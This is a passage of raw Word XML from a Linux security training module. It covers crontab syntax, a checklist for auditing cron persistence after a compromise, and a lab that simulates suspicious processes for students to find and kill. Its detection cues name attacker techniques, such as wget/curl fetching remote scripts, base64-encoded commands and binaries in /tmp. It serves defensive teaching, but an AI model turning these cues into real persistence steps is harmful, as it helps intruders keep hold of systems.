        <w:t xml:space="preserve">crontab Syntax</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cron jobs are defined using the following five-field time specification followed by the command to run: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Crontab format:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># ┌───────────── minute (0–59)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># │ ┌───────────── hour (0–23)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># │ │ ┌───────────── day of month (1–31)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># │ │ │ ┌───────────── month (1–12)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># │ │ │ │ ┌───────────── day of week (0–7, both 0 and 7 = Sunday)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># │ │ │ │ │</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"># * * * * * command_to_execute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Examples:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">*/5 * * * * /opt/scripts/monitor.sh      # Every 5 minutes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0 2 * * * /opt/scripts/backup.sh         # Daily at 2:00 AM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0 9 * * 1 /opt/scripts/weekly_report.sh  # Every Monday at 9:00 AM</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">0 */6 * * * /opt/scripts/sync.sh         # Every 6 hours</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">@reboot /opt/scripts/startup.sh          # At every system boot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Command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crontab -e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Edit the current user's crontab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crontab -l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List the current user's cron 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crontab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Remove the current user's entire crontab (use with caution)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crontab -l -u username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List cron jobs for a specific user (requires root)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cat /etc/crontab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View the system-wide crontab (runs jobs as specified users)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ls /etc/cron.d/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View additional cron job files installed by packages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ls /etc/cron.daily/ /etc/cron.hourly/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View scripts run on daily/hourly schedules by the system</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6E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="240"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="240"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8B0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Security Alert: Cron as a Persistence Mechanism</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="404040"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">After compromising a system, attackers frequently install cron jobs to maintain persistence. During incident response, always audit all crontabs: check /var/spool/cron/crontabs/ for per-user jobs, /etc/crontab, /etc/cron.d/, and all cron.daily/hourly/weekly/monthly directories. Look for recently modified files, unusual binary paths (especially in /tmp or /dev/shm), encoded commands (base64), and wget/curl commands downloading remote scripts.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Audit ALL cron jobs on a system (incident response checklist)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1. Check all user crontabs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">for user in $(cut -d: -f1 /etc/passwd); do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    echo "=== Crontab for $user ==="</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    crontab -l -u $user 2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">done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2. Check system-wide cron files</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /etc/crontab</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ls -la /etc/cron.d/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ls -la /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/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3. Find cron files modified in the last 24 hours (suspicious)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">find /etc/cron* /var/spool/cron -newer /etc/passwd -ls 2&gt;/dev/null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4. Check for at jobs (one-time scheduled tasks)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">atq</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Hands-On Lab: Process &amp; Service Investigation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Lab Overview</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="404040"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">In this lab, students will use Linux process and service management tools to investigate a simulated compromised system, identify suspicious activity, manage services securely, and detect attacker persistence mechanisms. All tasks should be performed on a Linux VM (Ubuntu or Kali recommended).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Duration: 90 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Learning Objectives:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use ps, top, and pgrep to investigate running processes and identify anomalies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Control services with systemctl and interpret service status output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Audit scheduled tasks to find simulated attacker persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Terminate suspicious processes using appropriate kill signals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Document findings in a structured incident format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1: Suspicious Process Investigation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="404040"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Situation: The SOC has received an alert that a server is experiencing abnormally high CPU usage. You have SSH access to the system and need to investigate what is running.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup (run as root to simulate the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Simulate a suspicious high-CPU process</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nohup dd if=/dev/urandom of=/dev/null &amp;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Simulate a suspicious process with a misleading name</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cp /bin/sleep /tmp/syslogd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nohup /tmp/syslogd 9999 &amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Investigation Tasks:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use ps aux sorted by CPU usage to identify the top resource-consuming processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use top to watch live resource usage — identify the PID of the dd process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Run pstree -p to map the process hierarchy and find the PPID of the suspicious processes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check the full command line of the suspicious 'syslogd' process in /tmp — how does this differ from the real syslogd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Gracefully terminate the dd process with SIGTERM, then verify it is gone with ps aux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Force-kill the /tmp/syslogd process with SIGKILL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Document your findings: PID, PPID, user, command, CPU%, and how you identified each process as suspicious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2: Service Hardening Audit</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="404040"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Situation: You have been asked to perform a service hardening review on a freshly installed Ubuntu server that will be used as a web server. Your goal is to ensure only necessary services are running and enabled at boot.</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List all currently running services using systemctl list-units --type=service --state=running</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">List all services enabled to start at boot using systemctl list-unit-files --type=service --state=enabled</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For each service found, classify it as: Required (web server role), Unnecessary (should be disabled), or Investigate Further</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable and stop at least two services that are unnecessary for a web server (e.g., bluetooth, avahi-daemon, cups)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Check the status of the SSH service — note the PID, uptime, and last five log lines</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ensure apache2 (or nginx) is installed, running, and enabled at boot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Write a short service hardening report listing: services reviewed, services disabled, justification, and remaining enabled services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3: Cron Persistence Detection</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
